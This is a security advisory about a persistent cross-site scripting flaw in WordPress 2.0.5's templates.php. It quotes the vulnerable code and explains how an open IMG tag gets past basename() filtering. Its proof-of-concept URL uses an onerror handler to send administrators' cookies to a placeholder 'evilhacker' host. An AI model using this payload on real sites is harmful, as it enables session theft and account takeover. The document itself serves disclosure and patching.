|
|
|
|
| |
| WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability". A vulnerability in WordPress's templates.php allows a user with access to the templates.php to insert arbitrary HTML and/or Javascript which can be then executed by other administrators. |
| |
Credit:
The information has been provided by David Kierznowski.
The original article can be found at: http://michaeldaw.org/md-hacks/wordpress-persistent-xss/
|
| |
Vulnerable Systems:
* WordPress version 2.0.5 and prior
Immune Systems:
* WordPress version 2.0.6
When editing files a shortcut is created titled recently accessed files . The anchor tag text is correctly escaped with wp_specialchars(); however, the link title is not sanitized. Instead, it is passed to get_file_description($file). The only restriction or limitation here is that our text is passed through basename. This means standard script tags will fail when ending with / . We can get around this by using open IMG tags; this works under FF and IE.
Vulnerable code in wp-admin/templates.php:
[line 22]$recents = get_option('recently_edited');
[line 72]update_recently_edited($file);
[Line 116]:foreach ($recents as $recent) :
echo "<li><a href='templates.php?file="
. wp_specialchars($recent, true) . "'>"
. get_file_description(basename($recent))
. "</a></li>";
Vulnerable function:
function get_file_description($file) {
global $wp_file_descriptions;
if (isset ($wp_file_descriptions[basename($file)])) {
return $wp_file_descriptions[basename($file)];
}
elseif (file_exists(ABSPATH.$file)) {
$template_data = implode('', file(ABSPATH.$file));
if (preg_match("|Template Name:(.*)|i",
$template_data, $name))
return $name[1];
}
return basename($file);
}
Proof of concept:
https://blogsite/wp/wp-admin/templates.php?file=<img src=""
onerror=javascript:document.location.href=
'http://evilhacker/capturecookie.php?'+document.cookie;>
Solution:
WordPress has fixed this for v2.0.6 and a patch has been released for v2.0.5, see: http://trac.wordpress.org/changeset/4665
|
|
|
|
|
|
|
